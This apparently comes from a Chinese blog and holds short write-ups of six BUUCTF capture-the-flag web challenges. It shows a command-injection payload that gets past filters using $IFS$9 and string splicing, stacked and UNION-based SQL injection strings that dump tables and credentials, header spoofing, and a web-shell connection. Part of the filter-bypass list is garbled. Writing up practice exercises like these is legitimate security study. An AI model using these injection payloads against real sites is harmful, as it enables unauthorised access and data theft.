BUUCTF

BUUCTF


一、[GXYCTF2019]Ping Ping Ping

在这里插入图片描述
使用ls命令
在这里插入图片描述
有个flag.php
cat flag
在这里插入图片描述

过滤了空格
linux下对空格的绕过方法:
1. I F S 2. {IFS} 2. IFS2.IFS$9 9 可改成其他数字 3. < 4. < > 重定向符 5. c a t , f l a g . p h p 用逗号 , 实现了空格功能先用 9可改成其他数字 3.< 4.<> 重定向符 5.{cat,flag.php} 用逗号,实现了空格功能 先用 9可改成其他数字3.<4.<>重定向符5.cat,flag.php用逗号,实现了空格功能先用{IFS}
在这里插入图片描述
被过滤了
$IFS$9
在这里插入图片描述
flag被过滤了
看看index文件

这个可以使用拼接绕过
构造payload:

/?ip=1;b=agcat$IFS$9fl$b.php

在这里插入图片描述

二、[SUCTF 2019]EasySQL

万能密码不行
堆叠注入
1’;show tables;
在这里插入图片描述
1;show columns from Flag#
不行看别的博客学到了
1、mssql中||表示连接操作符,不表示或的逻辑。
2、设置 sql_mode=PIPES_AS_CONCAT来转换操作符的作用//就是将||的或转换成连接符
在这里插入图片描述

三、[极客大挑战 2019]Secret File

在这里插入图片描述
看看源码
在这里插入图片描述

进去看看
在这里插入图片描述
点击直接跳转
在这里插入图片描述
抓个包看看
在这里插入图片描述
访问
在这里插入图片描述
直接使用php伪协议读取
在这里插入图片描述

四、[极客大挑战 2019]LoveSQL

万能密码试一下
在这里插入图片描述
存在注入点
联合注入

1' union select 1,2,3#

在这里插入图片描述
查数据库

1' union select 1,database(),3#

在这里插入图片描述
查表

1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='库名'#

在这里插入图片描述

查看l0ve1ysq1中内容

1' union select 1,group_concat(id,username,password),3 from  l0ve1ysq1#

在这里插入图片描述
拿到flag

五、[极客大挑战 2019]Http

在这里插入图片描述
抓个包
在这里插入图片描述
访问
在这里插入图片描述
来自这个网址加一个Referer:
在这里插入图片描述
发现响应信息提示:Please use “Syclover” browser,即需要增加User-Agent
在这里插入图片描述
加一个X-Forwarded-For: 127.0.0.1

    X-Forwarded-For 是一个 HTTP 扩展头部,用来表示 HTTP 请求端真实 IP。与之相关的有X-Real-IP、 $remote_addr。

拿到flag
在这里插入图片描述

六、[极客大挑战 2019]Knife

在这里插入图片描述
蚁剑链接
在这里插入图片描述
根目录下拿到flag
在这里插入图片描述

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值